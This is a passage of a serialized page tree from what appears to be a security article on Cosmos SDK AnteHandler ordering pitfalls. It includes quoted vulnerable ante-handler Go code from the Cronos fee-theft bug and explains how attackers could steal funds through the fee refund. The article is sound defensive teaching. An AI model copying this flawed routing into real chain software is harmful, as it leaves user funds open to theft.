NewConsumeGasForTxSizeDecorator",{"type":26,"tag":137,"props":81997,"children":81998},{"style":5601},[81999],{"type":32,"value":165},{"type":26,"tag":137,"props":82001,"children":82002},{"style":5584},[82003],{"type":32,"value":38634},{"type":26,"tag":137,"props":82005,"children":82006},{"style":5601},[82007],{"type":32,"value":470},{"type":26,"tag":137,"props":82009,"children":82010},{"style":5584},[82011],{"type":32,"value":81983},{"type":26,"tag":137,"props":82013,"children":82014},{"style":5601},[82015],{"type":32,"value":9320},{"type":26,"tag":137,"props":82017,"children":82018},{"class":5559,"line":5909},[82019,82024,82028,82032,82036,82040,82044,82048,82052,82057,82061,82065,82069,82074,82078,82082,82086,82091],{"type":26,"tag":137,"props":82020,"children":82021},{"style":5682},[82022],{"type":32,"value":82023},"    NewDeductFeeDecorator",{"type":26,"tag":137,"props":82025,"children":82026},{"style":5601},[82027],{"type":32,"value":165},{"type":26,"tag":137,"props":82029,"children":82030},{"style":5584},[82031],{"type":32,"value":38634},{"type":26,"tag":137,"props":82033,"children":82034},{"style":5601},[82035],{"type":32,"value":470},{"type":26,"tag":137,"props":82037,"children":82038},{"style":5584},[82039],{"type":32,"value":81983},{"type":26,"tag":137,"props":82041,"children":82042},{"style":5601},[82043],{"type":32,"value":1108},{"type":26,"tag":137,"props":82045,"children":82046},{"style":5584},[82047],{"type":32,"value":38634},{"type":26,"tag":137,"props":82049,"children":82050},{"style":5601},[82051],{"type":32,"value":470},{"type":26,"tag":137,"props":82053,"children":82054},{"style":5584},[82055],{"type":32,"value":82056},"BankKeeper",{"type":26,"tag":137,"props":82058,"children":82059},{"style":5601},[82060],{"type":32,"value":1108},{"type":26,"tag":137,"props":82062,"children":82063},{"style":5584},[82064],{"type":32,"value":38634},{"type":26,"tag":137,"props":82066,"children":82067},{"style":5601},[82068],{"type":32,"value":470},{"type":26,"tag":137,"props":82070,"children":82071},{"style":5584},[82072],{"type":32,"value":82073},"FeegrantKeeper",{"type":26,"tag":137,"props":82075,"children":82076},{"style":5601},[82077],{"type":32,"value":1108},{"type":26,"tag":137,"props":82079,"children":82080},{"style":5584},[82081],{"type":32,"value":38634},{"type":26,"tag":137,"props":82083,"children":82084},{"style":5601},[82085],{"type":32,"value":470},{"type":26,"tag":137,"props":82087,"children":82088},{"style":5584},[82089],{"type":32,"value":82090},"TxFeeChecker",{"type":26,"tag":137,"props":82092,"children":82093},{"style":5601},[82094],{"type":32,"value":9320},{"type":26,"tag":137,"props":82096,"children":82097},{"class":5559,"line":5930},[82098,82103,82107,82111,82115,82119,82123],{"type":26,"tag":137,"props":82099,"children":82100},{"style":5682},[82101],{"type":32,"value":82102},"    NewSetPubKeyDecorator",{"type":26,"tag":137,"props":82104,"children":82105},{"style":5601},[82106],{"type":32,"value":165},{"type":26,"tag":137,"props":82108,"children":82109},{"style":5584},[82110],{"type":32,"value":38634},{"type":26,"tag":137,"props":82112,"children":82113},{"style":5601},[82114],{"type":32,"value":470},{"type":26,"tag":137,"props":82116,"children":82117},{"style":5584},[82118],{"type":32,"value":81983},{"type":26,"tag":137,"props":82120,"children":82121},{"style":5601},[82122],{"type":32,"value":17769},{"type":26,"tag":137,"props":82124,"children":82125},{"style":5564},[82126],{"type":32,"value":82127},"// SetPubKeyDecorator must be called before all signature verification decorators\n",{"type":26,"tag":137,"props":82129,"children":82130},{"class":5559,"line":5939},[82131,82136,82140,82144,82148,82152],{"type":26,"tag":137,"props":82132,"children":82133},{"style":5682},[82134],{"type":32,"value":82135},"    NewValidateSigCountDecorator",{"type":26,"tag":137,"props":82137,"children":82138},{"style":5601},[82139],{"type":32,"value":165},{"type":26,"tag":137,"props":82141,"children":82142},{"style":5584},[82143],{"type":32,"value":38634},{"type":26,"tag":137,"props":82145,"children":82146},{"style":5601},[82147],{"type":32,"value":470},{"type":26,"tag":137,"props":82149,"children":82150},{"style":5584},[82151],{"type":32,"value":81983},{"type":26,"tag":137,"props":82153,"children":82154},{"style":5601},[82155],{"type":32,"value":9320},{"type":26,"tag":137,"props":82157,"children":82158},{"class":5559,"line":6191},[82159,82164,82168,82172,82176,82180,82184,82188,82192,82197],{"type":26,"tag":137,"props":82160,"children":82161},{"style":5682},[82162],{"type":32,"value":82163},"    NewSigGasConsumeDecorator",{"type":26,"tag":137,"props":82165,"children":82166},{"style":5601},[82167],{"type":32,"value":165},{"type":26,"tag":137,"props":82169,"children":82170},{"style":5584},[82171],{"type":32,"value":38634},{"type":26,"tag":137,"props":82173,"children":82174},{"style":5601},[82175],{"type":32,"value":470},{"type":26,"tag":137,"props":82177,"children":82178},{"style":5584},[82179],{"type":32,"value":81983},{"type":26,"tag":137,"props":82181,"children":82182},{"style":5601},[82183],{"type":32,"value":1108},{"type":26,"tag":137,"props":82185,"children":82186},{"style":5584},[82187],{"type":32,"value":38634},{"type":26,"tag":137,"props":82189,"children":82190},{"style":5601},[82191],{"type":32,"value":470},{"type":26,"tag":137,"props":82193,"children":82194},{"style":5584},[82195],{"type":32,"value":82196},"SigGasConsumer",{"type":26,"tag":137,"props":82198,"children":82199},{"style":5601},[82200],{"type":32,"value":9320},{"type":26,"tag":137,"props":82202,"children":82203},{"class":5559,"line":6208},[82204,82209,82213,82217,82221,82225,82229,82233,82237,82242],{"type":26,"tag":137,"props":82205,"children":82206},{"style":5682},[82207],{"type":32,"value":82208},"    NewSigVerificationDecorator",{"type":26,"tag":137,"props":82210,"children":82211},{"style":5601},[82212],{"type":32,"value":165},{"type":26,"tag":137,"props":82214,"children":82215},{"style":5584},[82216],{"type":32,"value":38634},{"type":26,"tag":137,"props":82218,"children":82219},{"style":5601},[82220],{"type":32,"value":470},{"type":26,"tag":137,"props":82222,"children":82223},{"style":5584},[82224],{"type":32,"value":81983},{"type":26,"tag":137,"props":82226,"children":82227},{"style":5601},[82228],{"type":32,"value":1108},{"type":26,"tag":137,"props":82230,"children":82231},{"style":5584},[82232],{"type":32,"value":38634},{"type":26,"tag":137,"props":82234,"children":82235},{"style":5601},[82236],{"type":32,"value":470},{"type":26,"tag":137,"props":82238,"children":82239},{"style":5584},[82240],{"type":32,"value":82241},"SignModeHandler",{"type":26,"tag":137,"props":82243,"children":82244},{"style":5601},[82245],{"type":32,"value":9320},{"type":26,"tag":137,"props":82247,"children":82248},{"class":5559,"line":6225},[82249,82254,82258,82262,82266,82270],{"type":26,"tag":137,"props":82250,"children":82251},{"style":5682},[82252],{"type":32,"value":82253},"    NewIncrementSequenceDecorator",{"type":26,"tag":137,"props":82255,"children":82256},{"style":5601},[82257],{"type":32,"value":165},{"type":26,"tag":137,"props":82259,"children":82260},{"style":5584},[82261],{"type":32,"value":38634},{"type":26,"tag":137,"props":82263,"children":82264},{"style":5601},[82265],{"type":32,"value":470},{"type":26,"tag":137,"props":82267,"children":82268},{"style":5584},[82269],{"type":32,"value":81983},{"type":26,"tag":137,"props":82271,"children":82272},{"style":5601},[82273],{"type":32,"value":9320},{"type":26,"tag":137,"props":82275,"children":82276},{"class":5559,"line":6238},[82277],{"type":26,"tag":137,"props":82278,"children":82279},{"style":5601},[82280],{"type":32,"value":6507},{"type":26,"tag":35,"props":82282,"children":82283},{},[82284,82286,82291,82293,82299,82300,82306],{"type":32,"value":82285},"Unfortunately, that order wouldn't work. This is because there are other ",{"type":26,"tag":130,"props":82287,"children":82289},{"className":82288},[],[82290],{"type":32,"value":81821},{"type":32,"value":82292},", such as ",{"type":26,"tag":130,"props":82294,"children":82296},{"className":82295},[],[82297],{"type":32,"value":82298},"SigGasConsumeDecorator",{"type":32,"value":3339},{"type":26,"tag":130,"props":82301,"children":82303},{"className":82302},[],[82304],{"type":32,"value":82305},"ConsumeGasForTxSizeDecorator",{"type":32,"value":82307},", that modify account balances. By placing our decorator at the very start of the chain, we might pass the check and later have the signers' balances deducted before reaching the end of the decorator chain and starting transaction execution. Consequently, the invariance we intended to ensure may no longer hold, rendering our check useless.",{"type":26,"tag":35,"props":82309,"children":82310},{},[82311,82313,82319,82321,82326],{"type":32,"value":82312},"The easiest \"mitigation\" is to move our decorator down into the chain list. We say this lightly because it's important to consider various factors such as whether nested ",{"type":26,"tag":130,"props":82314,"children":82316},{"className":82315},[],[82317],{"type":32,"value":82318},"msgs",{"type":32,"value":82320}," are allowed (e.g. the authz module is present), as this precaution alone might not be enough to fully resolve the issue. Without a comprehensive understanding of the entire system, there is a risk that mistakes will still be made in the ",{"type":26,"tag":130,"props":82322,"children":82324},{"className":82323},[],[82325],{"type":32,"value":81147},{"type":32,"value":82327}," chain.",{"type":26,"tag":118,"props":82329,"children":82331},{"id":82330},"real-world-examples-2",[82332],{"type":32,"value":79292},{"type":26,"tag":35,"props":82334,"children":82335},{},[82336,82338,82343,82345,82352],{"type":32,"value":82337},"An instance of ",{"type":26,"tag":130,"props":82339,"children":82341},{"className":82340},[],[82342],{"type":32,"value":81072},{"type":32,"value":82344}," misuse is a ",{"type":26,"tag":41,"props":82346,"children":82349},{"href":82347,"rel":82348},"https://medium.com/immunefi/cronos-theft-of-transactions-fees-bugfix-postmortem-b33f941b9570",[45],[82350],{"type":32,"value":82351},"Theft of Fund bug",{"type":32,"value":82353}," that was exploited in a Cronos contract.",{"type":26,"tag":35,"props":82355,"children":82356},{},[82357,82359,82364,82366,82371,82373,82379,82381,82387,82389,82394,82396,82401],{"type":32,"value":82358},"In this scenario, ",{"type":26,"tag":130,"props":82360,"children":82362},{"className":82361},[],[82363],{"type":32,"value":82318},{"type":32,"value":82365}," are multiplexed to different ",{"type":26,"tag":130,"props":82367,"children":82369},{"className":82368},[],[82370],{"type":32,"value":81072},{"type":32,"value":82372}," sets through the user-controlled ",{"type":26,"tag":130,"props":82374,"children":82376},{"className":82375},[],[82377],{"type":32,"value":82378},"ExtensionOptionsEthereumTx",{"type":32,"value":82380}," option. However, due to a lack of tx validation, if a ",{"type":26,"tag":130,"props":82382,"children":82384},{"className":82383},[],[82385],{"type":32,"value":82386},"MsgEthereumTx",{"type":32,"value":82388}," does not have ",{"type":26,"tag":130,"props":82390,"children":82392},{"className":82391},[],[82393],{"type":32,"value":82378},{"type":32,"value":82395}," specified, it will be routed to non-Ethereum ",{"type":26,"tag":130,"props":82397,"children":82399},{"className":82398},[],[82400],{"type":32,"value":81821},{"type":32,"value":82402},", failing to collect fees from users as intended. Consequently, attackers can exploit the fee refund at the end of transaction processing to steal funds.",{"type":26,"tag":35,"props":82404,"children":82405},{},[82406],{"type":26,"tag":41,"props":82407,"children":82410},{"href":82408,"rel":82409},"https://github.com/crypto-org-chain/ethermint/blob/82805507f7d2e83cad547736883dc22acfb52440/app/ante/ante.go#L33",[45],[82411],{"type":32,"value":79342},{"type":26,"tag":5512,"props":82413,"children":82415},{"code":82414,"language":78767,"meta":7,"className":78768,"style":7},"func NewAnteHandler(\n    ak evmtypes.AccountKeeper,\n    bankKeeper evmtypes.BankKeeper,\n    evmKeeper EVMKeeper,\n    feeGrantKeeper authante.FeegrantKeeper,\n    channelKeeper channelkeeper.Keeper,\n    signModeHandler authsigning.SignModeHandler,\n) sdk.AnteHandler {\n    return func(\n        ctx sdk.Context, tx sdk.Tx, sim bool,\n    ) (newCtx sdk.Context, err error) {\n        var anteHandler sdk.AnteHandler\n\n        defer Recover(ctx.Logger(), &err)\n\n        txWithExtensions, ok := tx.(authante.HasExtensionOptionsTx)\n        if ok {\n            opts := txWithExtensions.GetExtensionOptions()\n            if len(opts) > 0 {\n                switch typeURL := opts[0].GetTypeUrl(); typeURL {\n                case \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\":\n                    // handle as *evmtypes.MsgEthereumTx\n\n                    anteHandler = sdk.ChainAnteDecorators(\n                        NewEthSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n                        ...\n                        NewEthIncrementSenderSequenceDecorator(ak), // innermost AnteDecorator.\n                    )\n\n                default:\n                    return ctx, stacktrace.Propagate(\n                        sdkerrors.Wrap(sdkerrors.ErrUnknownExtensionOptions, typeURL),\n                        \"rejecting tx with unsupported extension option\",\n                    )\n                }\n\n                return anteHandler(ctx, tx, sim)\n            }\n        }\n\n        // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n\n        switch tx.(type) {\n        case sdk.Tx:\n            anteHandler = sdk.ChainAnteDecorators(\n                authante.NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n                 ...\n                authante.NewIncrementSequenceDecorator(ak), // innermost AnteDecorator\n            )\n        default:\n            return ctx, stacktrace.Propagate(\n                sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"invalid transaction type: %T\", tx),\n                \"transaction is not an SDK tx\",\n            )\n        }\n\n        return anteHandler(ctx, tx, sim)\n    }\n}\n",[82416],{"type":26,"tag":130,"props":82417,"children":82418},{"__ignoreMap":7},[82419,82435,82460,82484,82501,82526,82552,82577,82600,82616,82672,82713,82739,82746,82792,82799,82845,82861,82891,82926,82978,82995,83003,83010,83039,83055,83063,83089,83097,83104,83116,83150,83196,83208,83215,83222,83229,83268,83275,83282,83289,83297,83304,83328,83352,83380,83405,83413,83446,83453,83465,83496,83551,83564,83572,83580,83588,83628,83636],{"type":26,"tag":137,"props":82420,"children":82421},{"class":5559,"line":5560},[82422,82426,82431],{"type":26,"tag":137,"props":82423,"children":82424},{"style":5573},[82425],{"type":32,"value":78903},{"type":26,"tag":137,"props":82427,"children":82428},{"style":5682},[82429],{"type":32,"value":82430}," NewAnteHandler",{"type":26,"tag":137,"props":82432,"children":82433},{"style":5601},[82434],{"type":32,"value":6054},{"type":26,"tag":137,"props":82436,"children":82437},{"class":5559,"line":5412},[82438,82443,82448,82452,82456],{"type":26,"tag":137,"props":82439,"children":82440},{"style":5584},[82441],{"type":32,"value":82442},"    ak",{"type":26,"tag":137,"props":82444,"children":82445},{"style":6009},[82446],{"type":32,"value":82447}," evmtypes",{"type":26,"tag":137,"props":82449,"children":82450},{"style":5601},[82451],{"type":32,"value":470},{"type":26,"tag":137,"props":82453,"children":82454},{"style":6009},[82455],{"type":32,"value":81983},{"type":26,"tag":137,"props":82457,"children":82458},{"style":5601},[82459],{"type":32,"value":6099},{"type":26,"tag":137,"props":82461,"children":82462},{"class":5559,"line":5417},[82463,82468,82472,82476,82480],{"type":26,"tag":137,"props":82464,"children":82465},{"style":5584},[82466],{"type":32,"value":82467},"    bankKeeper",{"type":26,"tag":137,"props":82469,"children":82470},{"style":6009},[82471],{"type":32,"value":82447},{"type":26,"tag":137,"props":82473,"children":82474},{"style":5601},[82475],{"type":32,"value":470},{"type":26,"tag":137,"props":82477,"children":82478},{"style":6009},[82479],{"type":32,"value":82056},{"type":26,"tag":137,"props":82481,"children":82482},{"style":5601},[82483],{"type":32,"value":6099},{"type":26,"tag":137,"props":82485,"children":82486},{"class":5559,"line":5642},[82487,82492,82497],{"type":26,"tag":137,"props":82488,"children":82489},{"style":5584},[82490],{"type":32,"value":82491},"    evmKeeper",{"type":26,"tag":137,"props":82493,"children":82494},{"style":6009},[82495],{"type":32,"value":82496}," EVMKeeper",{"type":26,"tag":137,"props":82498,"children":82499},{"style":5601},[82500],{"type":32,"value":6099},{"type":26,"tag":137,"props":82502,"children":82503},{"class":5559,"line":5745},[82504,82509,82514,82518,82522],{"type":26,"tag":137,"props":82505,"children":82506},{"style":5584},[82507],{"type":32,"value":82508},"    feeGrantKeeper",{"type":26,"tag":137,"props":82510,"children":82511},{"style":6009},[82512],{"type":32,"value":82513}," authante",{"type":26,"tag":137,"props":82515,"children":82516},{"style":5601},[82517],{"type":32,"value":470},{"type":26,"tag":137,"props":82519,"children":82520},{"style":6009},[82521],{"type":32,"value":82073},{"type":26,"tag":137,"props":82523,"children":82524},{"style":5601},[82525],{"type":32,"value":6099},{"type":26,"tag":137,"props":82527,"children":82528},{"class":5559,"line":5850},[82529,82534,82539,82543,82548],{"type":26,"tag":137,"props":82530,"children":82531},{"style":5584},[82532],{"type":32,"value":82533},"    channelKeeper",{"type":26,"tag":137,"props":82535,"children":82536},{"style":6009},[82537],{"type":32,"value":82538}," channelkeeper",{"type":26,"tag":137,"props":82540,"children":82541},{"style":5601},[82542],{"type":32,"value":470},{"type":26,"tag":137,"props":82544,"children":82545},{"style":6009},[82546],{"type":32,"value":82547},"Keeper",{"type":26,"tag":137,"props":82549,"children":82550},{"style":5601},[82551],{"type":32,"value":6099},{"type":26,"tag":137,"props":82553,"children":82554},{"class":5559,"line":5878},[82555,82560,82565,82569,82573],{"type":26,"tag":137,"props":82556,"children":82557},{"style":5584},[82558],{"type":32,"value":82559},"    signModeHandler",{"type":26,"tag":137,"props":82561,"children":82562},{"style":6009},[82563],{"type":32,"value":82564}," authsigning",{"type":26,"tag":137,"props":82566,"children":82567},{"style":5601},[82568],{"type":32,"value":470},{"type":26,"tag":137,"props":82570,"children":82571},{"style":6009},[82572],{"type":32,"value":82241},{"type":26,"tag":137,"props":82574,"children":82575},{"style":5601},[82576],{"type":32,"value":6099},{"type":26,"tag":137,"props":82578,"children":82579},{"class":5559,"line":5891},[82580,82584,82588,82592,82596],{"type":26,"tag":137,"props":82581,"children":82582},{"style":5601},[82583],{"type":32,"value":5671},{"type":26,"tag":137,"props":82585,"children":82586},{"style":6009},[82587],{"type":32,"value":81332},{"type":26,"tag":137,"props":82589,"children":82590},{"style":5601},[82591],{"type":32,"value":470},{"type":26,"tag":137,"props":82593,"children":82594},{"style":6009},[82595],{"type":32,"value":81072},{"type":26,"tag":137,"props":82597,"children":82598},{"style":5601},[82599],{"type":32,"value":5875},{"type":26,"tag":137,"props":82601,"children":82602},{"class":5559,"line":5909},[82603,82607,82612],{"type":26,"tag":137,"props":82604,"children":82605},{"style":5610},[82606],{"type":32,"value":19582},{"type":26,"tag":137,"props":82608,"children":82609},{"style":5573},[82610],{"type":32,"value":82611}," func",{"type":26,"tag":137,"props":82613,"children":82614},{"style":5601},[82615],{"type":32,"value":6054},{"type":26,"tag":137,"props":82617,"children":82618},{"class":5559,"line":5930},[82619,82623,82627,82631,82635,82639,82643,82647,82651,82655,82659,82664,82668],{"type":26,"tag":137,"props":82620,"children":82621},{"style":5584},[82622],{"type":32,"value":28778},{"type":26,"tag":137,"props":82624,"children":82625},{"style":6009},[82626],{"type":32,"value":81243},{"type":26,"tag":137,"props":82628,"children":82629},{"style":5601},[82630],{"type":32,"value":470},{"type":26,"tag":137,"props":82632,"children":82633},{"style":6009},[82634],{"type":32,"value":78952},{"type":26,"tag":137,"props":82636,"children":82637},{"style":5601},[82638],{"type":32,"value":1108},{"type":26,"tag":137,"props":82640,"children":82641},{"style":5584},[82642],{"type":32,"value":81783},{"type":26,"tag":137,"props":82644,"children":82645},{"style":6009},[82646],{"type":32,"value":81243},{"type":26,"tag":137,"props":82648,"children":82649},{"style":5601},[82650],{"type":32,"value":470},{"type":26,"tag":137,"props":82652,"children":82653},{"style":6009},[82654],{"type":32,"value":81276},{"type":26,"tag":137,"props":82656,"children":82657},{"style":5601},[82658],{"type":32,"value":1108},{"type":26,"tag":137,"props":82660,"children":82661},{"style":5584},[82662],{"type":32,"value":82663},"sim",{"type":26,"tag":137,"props":82665,"children":82666},{"style":6009},[82667],{"type":32,"value":14641},{"type":26,"tag":137,"props":82669,"children":82670},{"style":5601},[82671],{"type":32,"value":6099},{"type":26,"tag":137,"props":82673,"children":82674},{"class":5559,"line":5939},[82675,82680,82685,82689,82693,82697,82701,82705,82709],{"type":26,"tag":137,"props":82676,"children":82677},{"style":5601},[82678],{"type":32,"value":82679},"    ) (",{"type":26,"tag":137,"props":82681,"children":82682},{"style":5584},[82683],{"type":32,"value":82684},"newCtx",{"type":26,"tag":137,"props":82686,"children":82687},{"style":6009},[82688],{"type":32,"value":81243},{"type":26,"tag":137,"props":82690,"children":82691},{"style":5601},[82692],{"type":32,"value":470},{"type":26,"tag":137,"props":82694,"children":82695},{"style":6009},[82696],{"type":32,"value":78952},{"type":26,"tag":137,"props":82698,"children":82699},{"style":5601},[82700],{"type":32,"value":1108},{"type":26,"tag":137,"props":82702,"children":82703},{"style":5584},[82704],{"type":32,"value":51022},{"type":26,"tag":137,"props":82706,"children":82707},{"style":6009},[82708],{"type":32,"value":17468},{"type":26,"tag":137,"props":82710,"children":82711},{"style":5601},[82712],{"type":32,"value":17395},{"type":26,"tag":137,"props":82714,"children":82715},{"class":5559,"line":6191},[82716,82721,82726,82730,82734],{"type":26,"tag":137,"props":82717,"children":82718},{"style":5573},[82719],{"type":32,"value":82720},"        var",{"type":26,"tag":137,"props":82722,"children":82723},{"style":5584},[82724],{"type":32,"value":82725}," anteHandler",{"type":26,"tag":137,"props":82727,"children":82728},{"style":6009},[82729],{"type":32,"value":81243},{"type":26,"tag":137,"props":82731,"children":82732},{"style":5601},[82733],{"type":32,"value":470},{"type":26,"tag":137,"props":82735,"children":82736},{"style":6009},[82737],{"type":32,"value":82738},"AnteHandler\n",{"type":26,"tag":137,"props":82740,"children":82741},{"class":5559,"line":6208},[82742],{"type":26,"tag":137,"props":82743,"children":82744},{"emptyLinePlaceholder":18},[82745],{"type":32,"value":6276},{"type":26,"tag":137,"props":82747,"children":82748},{"class":5559,"line":6225},[82749,82754,82759,82763,82767,82771,82776,82780,82784,82788],{"type":26,"tag":137,"props":82750,"children":82751},{"style":5610},[82752],{"type":32,"value":82753},"        defer",{"type":26,"tag":137,"props":82755,"children":82756},{"style":5682},[82757],{"type":32,"value":82758}," Recover",{"type":26,"tag":137,"props":82760,"children":82761},{"style":5601},[82762],{"type":32,"value":165},{"type":26,"tag":137,"props":82764,"children":82765},{"style":5584},[82766],{"type":32,"value":22874},{"type":26,"tag":137,"props":82768,"children":82769},{"style":5601},[82770],{"type":32,"value":470},{"type":26,"tag":137,"props":82772,"children":82773},{"style":5682},[82774],{"type":32,"value":82775},"Logger",{"type":26,"tag":137,"props":82777,"children":82778},{"style":5601},[82779],{"type":32,"value":20968},{"type":26,"tag":137,"props":82781,"children":82782},{"style":5590},[82783],{"type":32,"value":5694},{"type":26,"tag":137,"props":82785,"children":82786},{"style":5584},[82787],{"type":32,"value":51022},{"type":26,"tag":137,"props":82789,"children":82790},{"style":5601},[82791],{"type":32,"value":5742},{"type":26,"tag":137,"props":82793,"children":82794},{"class":5559,"line":6238},[82795],{"type":26,"tag":137,"props":82796,"children":82797},{"emptyLinePlaceholder":18},[82798],{"type":32,"value":6276},{"type":26,"tag":137,"props":82800,"children":82801},{"class":5559,"line":6247},[82802,82807,82811,82815,82819,82823,82827,82832,82836,82841],{"type":26,"tag":137,"props":82803,"children":82804},{"style":5584},[82805],{"type":32,"value":82806},"        txWithExtensions",{"type":26,"tag":137,"props":82808,"children":82809},{"style":5601},[82810],{"type":32,"value":1108},{"type":26,"tag":137,"props":82812,"children":82813},{"style":5584},[82814],{"type":32,"value":81369},{"type":26,"tag":137,"props":82816,"children":82817},{"style":5590},[82818],{"type":32,"value":79019},{"type":26,"tag":137,"props":82820,"children":82821},{"style":5584},[82822],{"type":32,"value":70629},{"type":26,"tag":137,"props":82824,"children":82825},{"style":5601},[82826],{"type":32,"value":81382},{"type":26,"tag":137,"props":82828,"children":82829},{"style":6009},[82830],{"type":32,"value":82831},"authante",{"type":26,"tag":137,"props":82833,"children":82834},{"style":5601},[82835],{"type":32,"value":470},{"type":26,"tag":137,"props":82837,"children":82838},{"style":6009},[82839],{"type":32,"value":82840},"HasExtensionOptionsTx",{"type":26,"tag":137,"props":82842,"children":82843},{"style":5601},[82844],{"type":32,"value":5742},{"type":26,"tag":137,"props":82846,"children":82847},{"class":5559,"line":6270},[82848,82852,82857],{"type":26,"tag":137,"props":82849,"children":82850},{"style":5610},[82851],{"type":32,"value":5856},{"type":26,"tag":137,"props":82853,"children":82854},{"style":5584},[82855],{"type":32,"value":82856}," ok",{"type":26,"tag":137,"props":82858,"children":82859},{"style":5601},[82860],{"type":32,"value":5875},{"type":26,"tag":137,"props":82862,"children":82863},{"class":5559,"line":6279},[82864,82869,82873,82878,82882,82887],{"type":26,"tag":137,"props":82865,"children":82866},{"style":5584},[82867],{"type":32,"value":82868},"            opts",{"type":26,"tag":137,"props":82870,"children":82871},{"style":5590},[82872],{"type":32,"value":79019},{"type":26,"tag":137,"props":82874,"children":82875},{"style":5584},[82876],{"type":32,"value":82877}," txWithExtensions",{"type":26,"tag":137,"props":82879,"children":82880},{"style":5601},[82881],{"type":32,"value":470},{"type":26,"tag":137,"props":82883,"children":82884},{"style":5682},[82885],{"type":32,"value":82886},"GetExtensionOptions",{"type":26,"tag":137,"props":82888,"children":82889},{"style":5601},[82890],{"type":32,"value":10320},{"type":26,"tag":137,"props":82892,"children":82893},{"class":5559,"line":6288},[82894,82898,82902,82906,82910,82914,82918,82922],{"type":26,"tag":137,"props":82895,"children":82896},{"style":5610},[82897],{"type":32,"value":61402},{"type":26,"tag":137,"props":82899,"children":82900},{"style":5682},[82901],{"type":32,"value":11143},{"type":26,"tag":137,"props":82903,"children":82904},{"style":5601},[82905],{"type":32,"value":165},{"type":26,"tag":137,"props":82907,"children":82908},{"style":5584},[82909],{"type":32,"value":51164},{"type":26,"tag":137,"props":82911,"children":82912},{"style":5601},[82913],{"type":32,"value":5671},{"type":26,"tag":137,"props":82915,"children":82916},{"style":5590},[82917],{"type":32,"value":13052},{"type":26,"tag":137,"props":82919,"children":82920},{"style":5626},[82921],{"type":32,"value":5629},{"type":26,"tag":137,"props":82923,"children":82924},{"style":5601},[82925],{"type":32,"value":5875},{"type":26,"tag":137,"props":82927,"children":82928},{"class":5559,"line":6355},[82929,82934,82939,82943,82948,82952,82956,82960,82965,82969,82974],{"type":26,"tag":137,"props":82930,"children":82931},{"style":5610},[82932],{"type":32,"value":82933},"                switch",{"type":26,"tag":137,"props":82935,"children":82936},{"style":5584},[82937],{"type":32,"value":82938}," typeURL",{"type":26,"tag":137,"props":82940,"children":82941},{"style":5590},[82942],{"type":32,"value":79019},{"type":26,"tag":137,"props":82944,"children":82945},{"style":5584},[82946],{"type":32,"value":82947}," opts",{"type":26,"tag":137,"props":82949,"children":82950},{"style":5601},[82951],{"type":32,"value":3016},{"type":26,"tag":137,"props":82953,"children":82954},{"style":5626},[82955],{"type":32,"value":1817},{"type":26,"tag":137,"props":82957,"children":82958},{"style":5601},[82959],{"type":32,"value":52951},{"type":26,"tag":137,"props":82961,"children":82962},{"style":5682},[82963],{"type":32,"value":82964},"GetTypeUrl",{"type":26,"tag":137,"props":82966,"children":82967},{"style":5601},[82968],{"type":32,"value":31041},{"type":26,"tag":137,"props":82970,"children":82971},{"style":5584},[82972],{"type":32,"value":82973},"typeURL",{"type":26,"tag":137,"props":82975,"children":82976},{"style":5601},[82977],{"type":32,"value":5875},{"type":26,"tag":137,"props":82979,"children":82980},{"class":5559,"line":6363},[82981,82986,82991],{"type":26,"tag":137,"props":82982,"children":82983},{"style":5610},[82984],{"type":32,"value":82985},"                case",{"type":26,"tag":137,"props":82987,"children":82988},{"style":6837},[82989],{"type":32,"value":82990}," \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\"",{"type":26,"tag":137,"props":82992,"children":82993},{"style":5601},[82994],{"type":32,"value":8152},{"type":26,"tag":137,"props":82996,"children":82997},{"class":5559,"line":6393},[82998],{"type":26,"tag":137,"props":82999,"children":83000},{"style":5564},[83001],{"type":32,"value":83002},"                    // handle as *evmtypes.MsgEthereumTx\n",{"type":26,"tag":137,"props":83004,"children":83005},{"class":5559,"line":6401},[83006],{"type":26,"tag":137,"props":83007,"children":83008},{"emptyLinePlaceholder":18},[83009],{"type":32,"value":6276},{"type":26,"tag":137,"props":83011,"children":83012},{"class":5559,"line":6433},[83013,83018,83022,83026,83030,83035],{"type":26,"tag":137,"props":83014,"children":83015},{"style":5584},[83016],{"type":32,"value":83017},"                    anteHandler",{"type":26,"tag":137,"props":83019,"children":83020},{"style":5590},[83021],{"type":32,"value":5593},{"type":26,"tag":137,"props":83023,"children":83024},{"style":5584},[83025],{"type":32,"value":81243},{"type":26,"tag":137,"props":83027,"children":83028},{"style":5601},[83029],{"type":32,"value":470},{"type":26,"tag":137,"props":83031,"children":83032},{"style":5682},[83033],{"type":32,"value":83034},"ChainAnteDecorators",{"type":26,"tag":137,"props":83036,"children":83037},{"style":5601},[83038],{"type":32,"value":6054},{"type":26,"tag":137,"props":83040,"children":83041},{"class":5559,"line":6441},[83042,83047,83051],{"type":26,"tag":137,"props":83043,"children":83044},{"style":5682},[83045],{"type":32,"value":83046},"                        NewEthSetUpContextDecorator",{"type":26,"tag":137,"props":83048,"children":83049},{"style":5601},[83050],{"type":32,"value":20968},{"type":26,"tag":137,"props":83052,"children":83053},{"style":5564},[83054],{"type":32,"value":81897},{"type":26,"tag":137,"props":83056,"children":83057},{"class":5559,"line":6501},[83058],{"type":26,"tag":137,"props":83059,"children":83060},{"style":5590},[83061],{"type":32,"value":83062},"                        ...\n",{"type":26,"tag":137,"props":83064,"children":83065},{"class":5559,"line":11634},[83066,83071,83075,83080,83084],{"type":26,"tag":137,"props":83067,"children":83068},{"style":5682},[83069],{"type":32,"value":83070},"                        NewEthIncrementSenderSequenceDecorator",{"type":26,"tag":137,"props":83072,"children":83073},{"style":5601},[83074],{"type":32,"value":165},{"type":26,"tag":137,"props":83076,"children":83077},{"style":5584},[83078],{"type":32,"value":83079},"ak",{"type":26,"tag":137,"props":83081,"children":83082},{"style":5601},[83083],{"type":32,"value":17769},{"type":26,"tag":137,"props":83085,"children":83086},{"style":5564},[83087],{"type":32,"value":83088},"// innermost AnteDecorator.\n",{"type":26,"tag":137,"props":83090,"children":83091},{"class":5559,"line":11652},[83092],{"type":26,"tag":137,"props":83093,"children":83094},{"style":5601},[83095],{"type":32,"value":83096},"                    